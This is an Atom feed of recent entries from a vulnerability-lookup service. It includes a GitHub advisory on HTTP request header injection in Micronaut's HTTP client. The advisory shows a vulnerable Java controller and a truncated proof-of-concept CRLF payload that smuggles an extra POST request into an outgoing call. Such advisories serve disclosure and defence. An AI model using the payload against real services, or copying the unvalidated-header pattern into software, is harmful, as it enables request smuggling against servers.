<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T14:29:41.607450+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cnvd-2020-37908</id>
    <title>cnvd-2020-37908</title>
    <updated>2026-10-03T14:29:41.692102+00:00</updated>
    <content>cnvd-2020-37908</content>
    <link href="https://cve.radiocsirt.org/vuln/cnvd-2020-37908"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-38040</id>
    <title>EUVD-2026-38040</title>
    <updated>2026-10-03T14:29:41.692154+00:00</updated>
    <content>EUVD-2026-38040</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-38040"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2020-7611</id>
    <title>fkie_cve-2020-7611</title>
    <updated>2026-10-03T14:29:41.692178+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>All versions of io.micronaut:micronaut-http-client before 1.2.11 and all versions from 1.3.0 before 1.3.2 are vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2020-7611"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-694p-xrhg-x3wm</id>
    <title>GHSA-694p-xrhg-x3wm — Micronaut's HTTP client is vulnerable to HTTP Request Header Injection</title>
    <updated>2026-10-03T14:29:41.692232+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: io.micronaut:micronaut-http-client</p>
<p>### Vulnerability</p>
<p>Micronaut's HTTP client is vulnerable to "HTTP Request Header Injection" due to not validating request headers passed to the client.</p>
<p>Example of vulnerable code:</p>
<p>```java
@Controller("/hello")
public class HelloController {</p>
<p>@Inject
    @Client("/")
    RxHttpClient client;</p>
<p>@Get("/external-exploit")
    @Produces(MediaType.TEXT_PLAIN)
    public String externalExploit(@QueryValue("header-value") String headerValue) {
        return client.toBlocking().retrieve(
            HttpRequest.GET("/hello")
                .header("Test", headerValue)
        );
    }
}
```</p>
<p>In the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated.</p>
<p>For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.</p>
<p>```java
List&lt;String&gt; headerData = List.of(
    "Connection: Keep-Alive", // This keeps the connection open so another request can be stuffed in.
    "",
    "",
    "POST /hello/super-secret HTTP/1.1",
    "Host: 127.0.0.1",
    "Content-Length: 31",
    "",
    "{\"new\":\"json\",\"content\":\"here\"}",
    "",
    ""
);
String headerValue = "H\r\n" + String.join("\r\n", headerData);;
URI theURI =
    UriBuilder
        .of("/hello/external-exploit")
        .queryParam("header-value", headerValue) // Automatically URL encodes data
        .buil…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-694p-xrhg-x3wm"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2020-7611</id>
    <title>gsd-2020-7611</title>
    <updated>2026-10-03T14:29:41.692328+00:00</updated>
    <content>gsd-2020-7611</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2020-7611"/>
  </entry>
</feed>
